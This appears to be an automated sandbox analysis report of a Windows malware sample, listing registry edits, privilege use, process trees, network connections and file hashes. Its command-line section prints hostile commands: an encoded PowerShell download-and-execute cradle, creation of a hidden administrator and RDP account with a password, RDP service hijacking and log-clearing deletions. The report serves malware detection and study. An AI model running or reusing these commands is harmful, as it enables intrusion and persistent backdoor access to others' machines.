Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3968 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3968 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2416 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2824 wrote to memory of 1428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2824 wrote to memory of 1428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2416 wrote to memory of 3872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 4224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 4224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 4660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2416 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4876 wrote to memory of 4896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4876 wrote to memory of 4896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2416 wrote to memory of 4928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2416 wrote to memory of 4928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4928 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4928 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4944 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4944 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4960 wrote to memory of 4980 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4960 wrote to memory of 4980 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2416 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2416 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5016 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5016 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5032 wrote to memory of 5052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5032 wrote to memory of 5052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1920 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1920 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4136 wrote to memory of 4156 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4136 wrote to memory of 4156 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4176 wrote to memory of 1428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4176 wrote to memory of 1428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1428 wrote to memory of 2164 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1428 wrote to memory of 2164 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2344 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2344 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2348 wrote to memory of 4232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2348 wrote to memory of 4232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4324 wrote to memory of 4416 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4324 wrote to memory of 4416 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4416 wrote to memory of 4432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4416 wrote to memory of 4432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4452 wrote to memory of 4492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4452 wrote to memory of 4492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4492 wrote to memory of 4364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4492 wrote to memory of 4364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4328 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4328 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4520 wrote to memory of 4256 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4520 wrote to memory of 4256 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4536 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4536 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF4.tmp" "c:\Users\Admin\AppData\Local\Temp\0oh2zeve\CSC73CAA211EA44F09634A317902A77D0.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc a8OeqOZ0 /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc a8OeqOZ0 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0 /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc a8OeqOZ0

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc a8OeqOZ0

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.kabeltex.nl udp
N/A 82.151.33.2:8080 speedtest.kabeltex.nl tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

memory/3968-114-0x0000014EDF9E0000-0x0000014EDFC8A000-memory.dmp

memory/3968-117-0x0000014EDF723000-0x0000014EDF725000-memory.dmp

memory/3968-118-0x0000014EDF725000-0x0000014EDF726000-memory.dmp

memory/3968-119-0x0000014EDF726000-0x0000014EDF727000-memory.dmp

memory/3968-116-0x0000014EDF720000-0x0000014EDF722000-memory.dmp

memory/2416-120-0x0000000000000000-mapping.dmp

memory/2416-125-0x000001C26B3B0000-0x000001C26B3B1000-memory.dmp

memory/2416-129-0x000001C26BF60000-0x000001C26BF61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/2416-131-0x000001C26B430000-0x000001C26B432000-memory.dmp

memory/2416-134-0x000001C26B433000-0x000001C26B435000-memory.dmp

memory/2824-137-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.cmdline

MD5 d722ad1eacd192e12df0ba2fb28951b4
SHA1 d22ba3ccb96380f57c0b1a639597a2fd84d3b090
SHA256 e813cefcca45cc4fa9959a53f2af1a877296eab8ad9312175bb3abf100b092b0
SHA512 afb7c694fdb5139f4ccec4ac9103dc4aec6a96fd20113e0bdefc1e1bdcde3f86e773757b71e7e35c38dad44f24ea260aa5885aaa5cbcb88fdbfffc56d29de23b

\??\c:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
